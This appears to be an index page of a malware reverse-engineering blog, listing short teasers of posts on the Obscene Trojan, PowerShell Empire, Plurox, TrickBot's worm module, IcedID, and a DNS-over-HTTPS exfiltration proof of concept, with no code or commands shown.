A covid themed document was mentioned on twitter[1] by @ximo_lcg. Checking the Any.Run sandbox detonation[2] shows a TLS connection and an execution of rundll so I decided to take a look.| Random RE
After finding a collection of samples I noticed they were in a report: https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/| Random RE
The malware in this report has been blogged about before by a Russian researcher1, he referred to is as “Obscene Trojan” so that’s what I will also call it and we will go over it’s functionality in depth later in this blog but the more interesting part to me is the initial layer around the malware, it’s in Golang! This layer serves both as a wrapper layer that you would normally expect to see with crypters but also a dropper as it drops the decoded malware to detonate it instead of ...| Random RE
Powershell empire is a post-exploitation framework that premiered at BsidesLV in 2015, developed by some all around great individuals whos work I would highly recommend following and reading. It’s a framework that is used pretty frequently by pentesters, however like all good pentester tools the better it is the more likely it will end up being used by the bad guys. However I’m not here to debate any of that or even talk about detecting a framework versus detecting TTPs or any of that, to...| Random RE
Intro| Random RE
Intro Recently saw someone mentioning a sample of Plurox performing code flow obfuscation based on the result of a DNS request, kind of interesting and I have apparently lost the link to the person that originally mentioned the hash… so if you recognize it let me know and I’ll update this post.| Random RE
Intro Doing exfiltration over DNS isn’t a new concept but recently there’s been lots of people jumping on the DNS-over-HTTP(s)[3] bandwagon, which adds an interesting new layer to an existing TTP. This blog post is simply an aim to prove it’s possibility. We’re going to start with existing code using a DOH server and client written by Star Brilliant[1]. This server and client are setup in a way that makes for easy testing where they allow the traffic to passthrough.| Random RE
Another week and another CobInt downloader campaign but instead of their usual kits used to deliver the downloader this time we have an embedded flash file.| Random RE
Finally got some time to look a little deeper at the TrickBot worm module, there’s already been a number of posts out there in regards to this malware developing plugins related to network propagation[1] with it’s worm module. As was shared by Brad (@malware_traffic)[3] in a PCAP this malware has been seen propagating over SMB, it was believed they were testing an SMB exploit but most of the PCAPs I’ve gone through show the worming happening over SMB with EternalBlue. Most of the shellc...| Random RE
IcedID continues to evolve but yet not a lot of attention is given it, Joshua Platt, Vitali Kremez and myself recently released a report[1] detailing how they have been targeting and continue to target tax season in the midst of the Covid-19 pandemic which has extended tax season in the US to July.| Random RE